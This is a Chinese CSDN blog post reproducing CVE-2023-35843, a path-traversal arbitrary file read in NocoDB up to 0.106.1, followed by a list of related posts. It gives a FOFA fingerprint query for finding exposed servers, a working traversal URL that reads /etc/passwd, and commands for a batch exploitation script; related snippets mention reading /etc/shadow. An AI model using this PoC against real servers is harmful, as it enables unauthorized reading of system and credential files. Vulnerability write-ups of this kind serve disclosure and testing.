【CVE-2023-35843】NocoDB 任意文件读取漏洞

最新推荐文章于 2024-10-15 11:59:40 发布
最新推荐文章于 2024-10-15 11:59:40 发布
阅读量511 收藏 2
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/133658114
版权

一、漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二、影响范围

NocoDB<=0.106.1

三、网络空间搜索引擎搜索

fofa查询

icon_hash="-2017596142"

四、漏洞复现

poc

http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

浏览器直接访问

五、漏洞批量检测与利用

单个检测

python .\NocoDBReadfile.py -u http://ip:port

批量检测与利用

 python .\NocoDBReadfile.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231008-2 获取批量检测脚本

为赋新词强说愁
关注
CVE-2023-35843NocoDB任意文件读取漏洞复现
薛定谔嘚喵博客
09-07 743
NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件
NocoDB 文件读取(CVE-2023-35843)
失心少年
07-17 436
NocoDB版本小于0.106.1存在路径遍历漏洞,未经身份验证的攻击者可通过操纵/download路由的路径参数来访问服务器上的任意文件。此漏洞允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息
CVE-2023-35843NocoDB 任意文件读取漏洞(CVE-2023-35843
m0_46317063的博客
06-29 663
cve-2023-35843
漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)
qq_53003652的博客
10-08 243
NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作。
漏洞复现(CVE-2023-35843)
2301_80127209的博客
10-13 251
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作。
漏洞复现】NocoDB任意文件读取 CVE-2023-35843
rm -rf *
11-02 155
NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
NocoDB任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-05 361
NocoDB是一个开源 Airtable 替代品,可以将 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 等转换为智能电子表格。(CVE-2023-35843) NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
从零复现--NocoDB任意文件读取(CVE-2023-35843)
weixin_44632654的博客
10-16 836
NocoDB目前适用于MySQL、PostgreSQL、Microsoft、SQLServer、SQLite、Amazon Aurora 和 MariaDB 数据库。免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!NocoDB存在路径遍历漏洞,未经身份验证的攻击者可以通过操纵/download路由的路径参数来访问服务器上的任意文件
Goby漏洞更新 | Altenergy Power System Control Software set_timezone 远程命令执行漏洞CVE-2023-28343)
m0_46699477的博客
03-21 698
Altenergy Power System Control Software set_timezone 远程命令执行漏洞CVE-2023-28343)
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 6852
网络安全-CVE - CIS 漏洞分析以及解决
任意文件读取漏洞
m0_57276420的博客
04-08 5858
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
无胁科技-TVD每日漏洞情报-2022-6-15
wuthreat无胁科技的博客
06-15 373
漏洞名称:NocoDB服务器端请求伪造漏洞 漏洞级别:严重 漏洞编号:CVE-2022-2062;CNNVD-202206-1151 相关涉及:NocoDB NocoDB 0.91.7 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-11997漏洞名称:NocoDB特权升级漏洞 漏洞级别:严重 漏洞编号:CVE-2022-2063;CNNVD-202206-1149 相关涉及:NocoDB NocoDB 0.91.7 漏
NocoDB:在任何数据库上创建即时电子表格和 REST API。
o1lab的博客
09-30 6836
NocoDB 是一个免费的开源工具,可以在任何数据库上创建智​​能电子表格和 REST APIs。 NocoDB 的工作原理是连接到任何关系数据库并将它们转换为智能电子表格界面 + 为您提供即时 REST API!这允许您与团队协作构建无代码应用程序。 NocoDB 目前适用于 MySQL、PostgreSQL、Microsoft SQL Server、SQLite、Amazon Aurora 和 MariaDB 数据库。 快速尝试 使用Docker docker run -d --n..
NocoDB安装与建立问题
微生物系统进化
09-26 1831
NocoDB安装与建立 前置安装 Node.js java 12.0以上 NocoDB 本地安装,https://github.com/nocodb/nocodb 注册 https://cloud.memfiredb.com 邀请码CwkxmF 详细安装过程参考https://segmentfault.com/a/1190000040233248?sort=votes### 布置中的问题 ip地址不要带上端口,端口部分输入为:5433 ...
网数中心举办CISAW安全软件教师培训 助力国家网络安全战略
最新发布
qq_44969472的博客
10-15 441
他强调,CISAW安全软件人员认证应立足我国软件安全开发的特色,以服务国家网络安全战略布局为核心,通过认证结果不断带动人员能力提升,聚焦行业需求、热点和难点问题,进一步完善创新发展体系。我们相信,随着CISAW认证体系的不断完善和发展,必将为我国信息安全领域输送更多优秀的人才,助力国家信息安全事业迈上新的台阶。这一环节得到了大家的一致好评,许多教师表示,通过实际操作,他们不仅巩固了所学知识,还获得了更多的实战经验。他表示,通过这次培训,大家不仅学到了最新的技术和理念,更重要的是,明确了未来努力的方向。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1261
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值